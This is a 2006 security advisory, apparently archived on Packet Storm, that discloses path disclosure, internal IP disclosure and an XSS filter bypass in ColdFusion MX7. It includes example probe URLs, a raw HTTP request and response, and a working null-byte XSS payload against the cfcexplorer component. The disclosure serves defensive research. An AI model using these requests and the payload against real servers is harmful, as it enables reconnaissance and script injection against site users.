what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

coldfusionMX7.txt

coldfusionMX7.txt
Posted Dec 11, 2006
Authored by Brett Moore SA | Site security-assessment.com

ColdFusion MX7 suffers from path disclosure, internal IP address disclosure, and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 55f86e7929a884f0b6dd3f764aaf710b98410a62ad57cf00d38bfc635592b514

coldfusionMX7.txt

Change Mirror Download
Just clearing stuff out before Christmas.

========================================================================
= ColdFusion MX7 - Multiple Vulnerabilities
=
= Vendor Website:
= http://www.Adobe.com
=
= Affected Software:
= ColdFusion MX7 (and possibly MX6)
=
= Public disclosure on Monday December 11, 2006
========================================================================

== Overview ==

This advisory discloses three separate security issues in ColdFusion
MX7.

* Server Path Disclosure *

It is possible to cause the server to disclose the local path by making
an invalid request. This information could be used to aide in other file
or path based attacks.

The request must be for an existing file, that has an extension not
handled by the web server. (ie: not asp,aspx).

The request must be terminated with either of the following;
/.jws
/.cfm
/.cfml
/.cfc

Some example requests are;
http://serverip/page1.htm/a.cfm
http://serverip/CFIDE/administrator/analyzer/img/minus.gif/a.cfm
http://serverip/jrunscripts/jrun.ini/a.cfm
http://serverip/jrunscripts/jrunserver.store/a.cfm
http://serverip/jrunscripts/readme.txt/a.cfm

This has been confirmed against installs that do NOT have debugging or
robust exception information turned on.

Sending a request in this format returns a message similar to;
Error parsing the Tag Library Descriptor
file:/d:/sekretpath/hidden/page1.htm/..

* Internal IP Address Disclosure *

It is possible to cause the server to disclose the internal network IP
address of the host. This information could be used to aide in other
network based attacks.

Making a request to the /CFIDE/administrator/login.cfm page WITHOUT
supplying a host, will result in the internal IP address of the
server to be disclosed as part of an href tag.

------------------------------------------------------------------
GET /CFIDE/administrator/login.cfm HTTP/1.0


HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 09 Nov 2006 05:44:02 GMT

<html>
<head>
<LINK REL="SHORTCUT ICON"
href="http://INTERNALADDRESS:80/CFIDE/administrator/favicon.ico">

------------------------------------------------------------------

* Cross Site Scripting Protection Bypass *

ColdFusion MX7 appears to have built in protection against cross
site scripting attacks, and will replace <script> tags with
<invalid tag>.

Example URL that is converted to a 'safe' format;

http://server/CFIDE/componentutils/cfcexplorer.cfc?
method=getcfcinhtmtestl&name=CFIDE.adminapi.administrator&
path=/cfide/adminapi/administrator.cfctest">
<script>alert()</script>

By inserting a %00 within the <script> tag, it is possible to still
conduct cross site scripting attacks against users of
Internet Explorer.

Example URL that will have script executed;

http://server/CFIDE/componentutils/cfcexplorer.cfc?
method=getcfcinhtmtestl&name=CFIDE.adminapi.administrator&
path=/cfide/adminapi/administrator.cfctest">
<%00script>alert(document.domain)</script>

== Solutions ==

Currently, the issues outlined in the report are being considered for
the next major version of ColdFusion - the release date is currently not

finalized. There is currently no plan to release security bulletins for
any of the issues from the report

== Credit ==

Discovered and advised to Adobe November 11, 2006 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout the Asia Pacific region. Our
clients include some of the largest globally recognised companies in
areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and
a high level of technical expertise while creating long and lasting
professional relationships with our clients.

Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.

Security-Assessment.com is an Endorsed Commonwealth Government of
Australia supplier and sits on the Australian Government
Attorney-General's Department Critical Infrastructure Project panel.
We are certified by both Visa and MasterCard under their Payment
Card Industry Data Security Standard Programs.

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close